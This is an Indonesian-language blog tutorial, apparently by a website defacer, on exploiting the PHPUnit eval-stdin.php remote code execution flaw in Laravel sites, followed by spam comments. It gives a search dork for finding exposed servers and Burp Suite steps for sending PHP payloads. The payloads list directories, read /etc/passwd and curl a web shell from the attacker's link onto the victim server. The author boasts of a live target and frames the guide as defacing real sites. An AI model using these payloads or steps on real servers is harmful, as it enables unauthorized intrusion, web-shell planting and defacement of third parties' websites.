Deface POC Laravel PHP Unit Manual
Setelah beberapa kali gagal, akhirnya gw nemu yg vuln dan cocok buat di tusbool.
Langsung aja..
Alat dan bahan :
-browser (pastinya)
-burpsuite (google banyak asw)
-kopi
-rokok
-dan yg paling penting adalah kesantuy an yg hqq
Nb: sebenarnya ada tools auto exploitnya, cuman kalo make tools doang tanpa ngerti cara kerjanya sama aja NOL. Kalo mau cari toolsnya cari aja digoogle bnyk.
Ok pertama dorking dulu :
inurl:/phpunit/phpunit/ intitle:"index of" site:.com
Exploit: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Titik Vuln : /eval-stdin.php
Gw udh ada live targetnya :p
1. Vuln apa tidaknya ditandai dgn ngeblank/warna putih doang, liat gambar
2. Masuk pengaturan browser, ubah network koneksinya jadi manual dgn proxy 127.0.0.1 dan portnya 8080 buat nanti di sambungkan dgn burpsuite
3. Buka burpsuite, masuk ke proxy dan tekan intereceptnya biar on, lihat gambar
4. Kembali ke browser dan reload web yg vuln tadi, ini agar si burpsuite bisa membaca anunya web tsb :v. Liat icon burpsuitenya di bawah akan berwarna orange apabila dia berhasil membaca
5. Lihat gambar, nanti akan muncul kek gitu. Selanjutnya klik kanan dan Send to Repeater jangan lupa matikan interecept kalo udah di send ke repeater
6. Next masuk ke repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan
<?php system('tail /etc/passwd');?> 
7. Langsung aja kita tusbool gan dgn perintah curl buat manggil shell kita <?php system('curl (link shell elu) -o x.php');?>
Nb: x.php itu nama shell yg akan kalian kirim ke web tsb, nantinya terserah elulah mo pake nama apa
8. Kalo udah, sekarang kita cek lagi apakah shell kita udah terupload apa belum, perintahnya sama kek yg pertama <?php system('ls');?> atau bisa juga <?php system('ls -la');?>
Noh dah muncul shell gw :p
8. Terakhir tinggal akses aja shell kalian. Caranya? Hapus eval-stdin.php ganti jadi nama shell lu..
Thanks to :
. /sT0ry_mB3m
Mr.L3rbi
M.A
--------------
Referensi:
https://exploit.linuxsec.org/laravel-phpunit-remote-code-execution/
https://www.exploitkita.org/2019/06/tools-laravel-framework-phpunit-rce.html?m=1
https://blog.n45ht.web.id/2019/07/phpunit-autoexploiterrce.html?m=1
~prizeHdru
Loading...
Great post, and great website. Thanks for the information! Why Do I Smell Gas Coming From My Oven?
ReplyDeleteI love this blog!! The flash up the top is awesome!! San Diego web design
ReplyDeleteThe speed at which your site loads is very important. Firstly, a fast loading site will have your readers stick around longer. Joomla Web Support
ReplyDeleteLove to read it,Waiting For More new Update and I Already Read your Recent Post its Great Thanks. credit care
ReplyDeleteReally I enjoy your site with effective and useful information. It is included very nice post with a lot of our resources.thanks for share. i enjoy this post. British Airport Transfers London Airports
ReplyDeleteReally I enjoy your site with effective and useful information. It is included very nice post with a lot of our resources.thanks for share. i enjoy this post
ReplyDeleteonline urgent care